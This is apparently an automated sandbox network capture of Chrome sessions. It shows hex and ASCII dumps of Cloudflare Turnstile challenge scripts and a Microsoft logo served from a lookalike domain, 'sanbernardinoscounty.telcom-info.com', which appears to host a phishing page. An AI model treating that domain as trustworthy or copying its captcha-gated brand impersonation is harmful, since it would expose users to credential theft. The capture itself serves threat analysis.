                                                                          2024-10-01 22:42:49 UTC1369INData Raw: 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 52 45 4e 44 45 52 3d 22 72 65 6e 64 65 72 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 7d 29 28 70 65 7c 7c 28 70 65 3d 7b 7d 29 29 3b 76 61 72 20 6f 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 7d 29
                                                                          Data Ascii: al",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(function(e){e.RENDER="render",e.EXECUTE="execute"})(pe||(pe={}));var oe;(function(e){e.EXECUTE="execute"})
                                                                          2024-10-01 22:42:49 UTC1369INData Raw: 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e
                                                                          Data Ascii: archParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clearance_level!=="default"&&r.set("clearance_level",e.params.
                                                                          2024-10-01 22:42:49 UTC1369INData Raw: 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 6c 2c 67 3d 4c 28 43 72 2c 28 6c 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 6c 21 3d 3d 76 6f 69 64 20 30 3f 6c 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 66 2c 70 3d 4c 28 4e 72 2c 28 66 3d 28 61 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 61 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 66 21 3d 3d 76 6f 69 64 20 30 3f 66 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29
                                                                          Data Ascii: ===Se.FAILURE_HAVING_TROUBLES,l,g=L(Cr,(l=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&l!==void 0?l:"nonexistent"),f,p=L(Nr,(f=(a=e.displayLanguage)===null||a===void 0?void 0:a.toLowerCase())!==null&&f!==void 0?f:"nonexistent")
                                                                          2024-10-01 22:42:49 UTC1369INData Raw: 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 67 29 7b 76 61 72 20 66 3d 5b 6e 75 6c 6c 5d 3b 66 2e 70 75 73 68 2e 61 70 70 6c 79 28 66 2c 6c 29 3b 76 61 72 20 70 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 66 29 2c 73 3d 6e 65 77 20 70 3b 72 65 74 75 72 6e 20 67 26 26 4a 28 73 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 73 7d 2c 49 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74
                                                                          Data Ascii: uct:Ie=function(c,l,g){var f=[null];f.push.apply(f,l);var p=Function.bind.apply(c,f),s=new p;return g&&J(s,g.prototype),s},Ie.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Object.getPrototypeOf:function(a){return a.__proto__||Object
                                                                          2024-10-01 22:42:49 UTC1369INData Raw: 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 71 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 57 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 57 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 57 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 54 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63 75 6d 65 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 3b 69 66 28 55 28 72 2c 48 54 4d 4c 53 63 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 72
                                                                          Data Ascii: flare Turnstile] ".concat(e))}function qe(e){return e.startsWith(We)?e.substring(We.length):null}function K(e){return"".concat(We).concat(e)}function Tt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=document.currentScript;if(U(r,HTMLScriptElement)&&e.test(r
                                                                          2024-10-01 22:42:49 UTC1369INData Raw: 66 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b 76 61 72 20 73 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 73 2e 63 6c 61 73 73 4e 61 6d 65 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 66 65 65 64 62 61 63 6b 22 2c 73 2e 69 64 3d
                                                                          Data Ascii: f.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";var s=document.createElement("div");s.className="cf-turnstile-feedback",s.id=


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          14192.168.2.649736104.18.95.414434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:42:49 UTC795OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/u972b/0x4AAAAAAAwgo_4sU4R7BlsA/auto/fbE/normal/auto/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-10-01 22:42:49 UTC210INHTTP/1.1 200 OK
                                                                          Date: Tue, 01 Oct 2024 22:42:49 GMT
                                                                          Content-Type: image/png
                                                                          Content-Length: 61
                                                                          Connection: close
                                                                          cache-control: max-age=2629800, public
                                                                          Server: cloudflare
                                                                          CF-RAY: 8cbff7d5ab9f42ec-EWR
                                                                          2024-10-01 22:42:49 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                          Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          15192.168.2.649737104.21.55.674434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:42:50 UTC428OUTGET /captcha/logo.svg HTTP/1.1
                                                                          Host: sanbernardinoscounty.telcom-info.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5
                                                                          2024-10-01 22:42:50 UTC658INHTTP/1.1 200 OK
                                                                          Date: Tue, 01 Oct 2024 22:42:50 GMT
                                                                          Content-Type: image/svg+xml
                                                                          Content-Length: 3202
                                                                          Connection: close
                                                                          Last-Modified: Tue, 01 Oct 2024 20:49:23 GMT
                                                                          Cache-Control: max-age=14400
                                                                          CF-Cache-Status: HIT
                                                                          Age: 3331
                                                                          Accept-Ranges: bytes
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lyNN40THRulj0BQvvbhVSSWoEAfx9NyzcRYbvl%2FvCTZxhxEtXia1VYmVLifIquGOagyB0TCqPeb5Bk22%2FCbhy4JdMtYBlbkqkAlwe0JyJzZGH4aylrk8nEu2sArIkGNy6fHJrNOj4hlFqNlG8Gnks7GqiEi4df4%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8cbff7d768189e1a-EWR
                                                                          2024-10-01 22:42:50 UTC711INData Raw: 3c 73 76 67 20 69 64 3d 22 4d 53 4c 6f 67 6f 22 20 77 69 64 74 68 3d 22 39 39 22 20 68 65 69 67 68 74 3d 22 32 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 3c 67 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 3e 0d 0a 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 37 33 37 34 37 34 22 0d 0a 64 3d 22 6d 33 34 2e 36 34 20 31 32 2e 30 37 2d 2e 35 38 20 31 2e 36 35 68 2d 2e 30 34 63 2d 2e 31 2d 2e 33 39 2d 2e 32 38 2d 2e 39 33 2d 2e 35 36 2d 31 2e 36 33 6c 2d 33 2e 31 34 2d 37 2e 39 68 2d 33 2e 30 38 76 31 32 2e 35 36 68 32 2e 30 33 56 39 2e 30 33 6c 2d 2e 30 33 2d 31 2e 37 63 2d 2e 30 31 2d 2e 33 34 2d 2e 30 35 2d 2e 36 2d 2e 30 36 2d 2e 38 31
                                                                          Data Ascii: <svg id="MSLogo" width="99" height="22" xmlns="http://www.w3.org/2000/svg"><g fill="none" fill-rule="evenodd"><path fill="#737474"d="m34.64 12.07-.58 1.65h-.04c-.1-.39-.28-.93-.56-1.63l-3.14-7.9h-3.08v12.56h2.03V9.03l-.03-1.7c-.01-.34-.05-.6-.06-.81
                                                                          2024-10-01 22:42:50 UTC1369INData Raw: 2e 33 20 31 2d 31 2e 37 20 31 2e 37 34 61 35 2e 35 37 20 35 2e 35 37 20 30 20 30 20 30 2d 2e 30 31 20 34 2e 39 63 2e 33 37 2e 37 2e 39 20 31 2e 32 33 20 31 2e 35 38 20 31 2e 36 2e 36 37 2e 33 38 20 31 2e 34 35 2e 35 37 20 32 2e 33 31 2e 35 37 20 31 2e 30 31 20 30 20 31 2e 38 37 2d 2e 32 20 32 2e 35 36 2d 2e 36 6c 2e 30 33 2d 2e 30 32 76 2d 31 2e 39 34 6c 2d 2e 31 2e 30 37 63 2d 2e 33 2e 32 33 2d 2e 36 35 2e 34 2d 31 2e 30 33 2e 35 34 61 33 2e 31 32 20 33 2e 31 32 20 30 20 30 20 31 2d 31 2e 30 31 2e 32 63 2d 2e 38 33 20 30 2d 31 2e 35 2d 2e 32 36 2d 31 2e 39 38 2d 2e 37 38 61 33 20 33 20 30 20 30 20 31 2d 2e 37 33 2d 32 2e 31 34 63 30 2d 2e 39 2e 32 35 2d 31 2e 36 35 2e 37 36 2d 32 2e 32 61 32 2e 36 20 32 2e 36 20 30 20 30 20 31 20 31 2e 39 38 2d 2e 38 31
                                                                          Data Ascii: .3 1-1.7 1.74a5.57 5.57 0 0 0-.01 4.9c.37.7.9 1.23 1.58 1.6.67.38 1.45.57 2.31.57 1.01 0 1.87-.2 2.56-.6l.03-.02v-1.94l-.1.07c-.3.23-.65.4-1.03.54a3.12 3.12 0 0 1-1.01.2c-.83 0-1.5-.26-1.98-.78a3 3 0 0 1-.73-2.14c0-.9.25-1.65.76-2.2a2.6 2.6 0 0 1 1.98-.81
                                                                          2024-10-01 22:42:50 UTC1122INData Raw: 36 35 2d 2e 35 32 2e 39 38 2d 31 2e 32 2e 39 38 2d 32 2e 30 35 20 30 2d 2e 36 2d 2e 31 38 2d 31 2e 31 32 2d 2e 35 33 2d 31 2e 35 34 2d 2e 33 34 2d 2e 34 32 2d 2e 39 34 2d 2e 38 2d 31 2e 37 38 2d 31 2e 31 34 6d 39 2e 36 38 20 33 63 2d 2e 34 2e 35 2d 31 20 2e 37 35 2d 31 2e 37 38 2e 37 35 2d 2e 37 37 20 30 2d 31 2e 33 39 2d 2e 32 36 2d 31 2e 38 32 2d 2e 37 37 61 33 2e 32 35 20 33 2e 32 35 20 30 20 30 20 31 2d 2e 36 35 2d 32 2e 31 36 63 30 2d 2e 39 36 2e 32 32 2d 31 2e 37 2e 36 35 2d 32 2e 32 32 61 32 2e 32 34 20 32 2e 32 34 20 30 20 30 20 31 20 31 2e 38 2d 2e 37 38 63 2e 37 35 20 30 20 31 2e 33 34 2e 32 35 20 31 2e 37 36 2e 37 34 2e 34 33 2e 35 2e 36 35 20 31 2e 32 34 2e 36 35 20 32 2e 32 20 30 20 2e 39 38 2d 2e 32 20 31 2e 37 33 2d 2e 36 20 32 2e 32 33 6d
                                                                          Data Ascii: 65-.52.98-1.2.98-2.05 0-.6-.18-1.12-.53-1.54-.34-.42-.94-.8-1.78-1.14m9.68 3c-.4.5-1 .75-1.78.75-.77 0-1.39-.26-1.82-.77a3.25 3.25 0 0 1-.65-2.16c0-.96.22-1.7.65-2.22a2.24 2.24 0 0 1 1.8-.78c.75 0 1.34.25 1.76.74.43.5.65 1.24.65 2.2 0 .98-.2 1.73-.6 2.23m


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          16192.168.2.649738104.18.94.414434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:42:50 UTC438OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-10-01 22:42:50 UTC240INHTTP/1.1 200 OK
                                                                          Date: Tue, 01 Oct 2024 22:42:50 GMT
                                                                          Content-Type: image/png
                                                                          Content-Length: 61
                                                                          Connection: close
                                                                          cache-control: max-age=2629800, public
                                                                          Server: cloudflare
                                                                          CF-RAY: 8cbff7d9ade75e7e-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-10-01 22:42:50 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                          Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          17192.168.2.649739104.18.94.414434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:42:51 UTC433OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8cbff7d01962c33d&lang=auto HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-10-01 22:42:51 UTC301INHTTP/1.1 200 OK
                                                                          Date: Tue, 01 Oct 2024 22:42:51 GMT
                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                          Content-Length: 116300
                                                                          Connection: close
                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          Server: cloudflare
                                                                          CF-RAY: 8cbff7df7b014361-EWR
                                                                          2024-10-01 22:42:51 UTC1068INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 5a 4a 79 54 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70
                                                                          Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qZJyT2={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"http
                                                                          2024-10-01 22:42:51 UTC1369INData Raw: 76 61 63 79 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 69 66 72 61 6d 65 5f 61 6c 74 22 3a 22 57 69 64 67 65 74 25 32 30 63 6f 6e 74 61 69 6e 69 6e 67 25 32 30 61 25 32 30 43 6c 6f 75 64 66 6c 61 72 65 25 32 30 73 65 63 75 72 69 74 79 25 32 30 63 68 61 6c 6c 65 6e 67 65 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 72 65 66 72 65 73 68 22 3a 22 52 65 66 72 65 73 68 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 73 75 63 63 65 73 73 22 3a 22 53 75 63 63 65 73 73 25 32 31 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 6f 6f 74 65 72 5f 74 65 72 6d 73 22 3a 22 54 65 72 6d 73 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 65 78 70 69 72 65 64 22 3a 22 45 78 70 69 72 65 64 22 2c 22 63 68 65 63 6b 5f 64 65 6c 61 79 73 22 3a 22 56 65 72 69 66 69 63 61 74 69 6f 6e 25 32 30 69 73 25 32 30 74 61
                                                                          Data Ascii: vacy","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","turnstile_refresh":"Refresh","turnstile_success":"Success%21","turnstile_footer_terms":"Terms","turnstile_expired":"Expired","check_delays":"Verification%20is%20ta
                                                                          2024-10-01 22:42:51 UTC1369INData Raw: 67 48 28 31 34 39 36 29 29 2f 31 31 29 2c 66 3d 3d 3d 64 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 37 33 32 31 33 33 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 49 28 31 35 33 35 29 5d 2c 65 4f 3d 66 75 6e 63 74 69 6f 6e 28 67 4a 2c 64 2c 65 2c 66 2c 67 29 7b 72 65 74 75 72 6e 20 67 4a 3d 67 49 2c 64 3d 7b 27 66 59 4a 66 74 27 3a 67 4a 28 39 37 31 29 2c 27 51 72 7a 50 45 27 3a 67 4a 28 34 34 30 29 2c 27 58 45 63 69 52 27 3a 67 4a 28 35 35 39 29 2c 27 76 68 51 53 66 27 3a 67 4a 28 31 33 32 38 29 2c 27 49 46 45 41 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69
                                                                          Data Ascii: gH(1496))/11),f===d)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,732133),eM=this||self,eN=eM[gI(1535)],eO=function(gJ,d,e,f,g){return gJ=gI,d={'fYJft':gJ(971),'QrzPE':gJ(440),'XEciR':gJ(559),'vhQSf':gJ(1328),'IFEAh':function(h,i){return h-i
                                                                          2024-10-01 22:42:51 UTC1369INData Raw: 20 68 21 3d 69 7d 2c 27 76 4c 79 56 4a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 78 63 6e 6e 63 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 67 56 77 4f 49 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 4a 50 4a 4d 6c 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2a 69 7d 2c 27 69 79 41 74 69 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 72 67 75 58 5a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 41 70 6f 66 4c 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 3d 69 7d 7d 2c 65 3d 53
                                                                          Data Ascii: h!=i},'vLyVJ':function(h,i){return h(i)},'xcnnc':function(h,i){return h(i)},'gVwOI':function(h,i){return h(i)},'JPJMl':function(h,i){return h*i},'iyAti':function(h,i){return h(i)},'rguXZ':function(h,i){return h<i},'ApofL':function(h,i){return h===i}},e=S
                                                                          2024-10-01 22:42:51 UTC1369INData Raw: 65 3b 63 61 73 65 27 31 27 3a 53 5b 67 4e 28 32 30 33 29 5d 5b 67 4e 28 34 31 32 29 5d 28 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 51 5b 67 4e 28 32 30 33 29 5d 5b 67 4e 28 38 38 36 29 5d 28 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 55 5b 67 4e 28 33 37 32 29 5d 26 26 28 61 34 3d 7b 7d 2c 61 34 5b 67 4e 28 37 30 39 29 5d 3d 67 4e 28 34 37 31 29 2c 61 34 5b 67 4e 28 31 33 37 30 29 5d 3d 5a 5b 67 4e 28 31 35 39 39 29 5d 5b 67 4e 28 36 34 36 29 5d 2c 61 34 5b 67 4e 28 36 38 33 29 5d 3d 54 5b 67 4e 28 38 33 37 29 5d 2c 61 34 5b 67 4e 28 39 30 35 29 5d 3d 61 30 2c 59 5b 67 4e 28 33 37 32 29 5d 5b 67 4e 28 36 32 31 29 5d 28 61 34 2c 27 2a 27 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 52 5b 67 4e 28 32 30 33 29 5d
                                                                          Data Ascii: e;case'1':S[gN(203)][gN(412)]();continue;case'2':Q[gN(203)][gN(886)]();continue;case'3':U[gN(372)]&&(a4={},a4[gN(709)]=gN(471),a4[gN(1370)]=Z[gN(1599)][gN(646)],a4[gN(683)]=T[gN(837)],a4[gN(905)]=a0,Y[gN(372)][gN(621)](a4,'*'));continue;case'4':R[gN(203)]
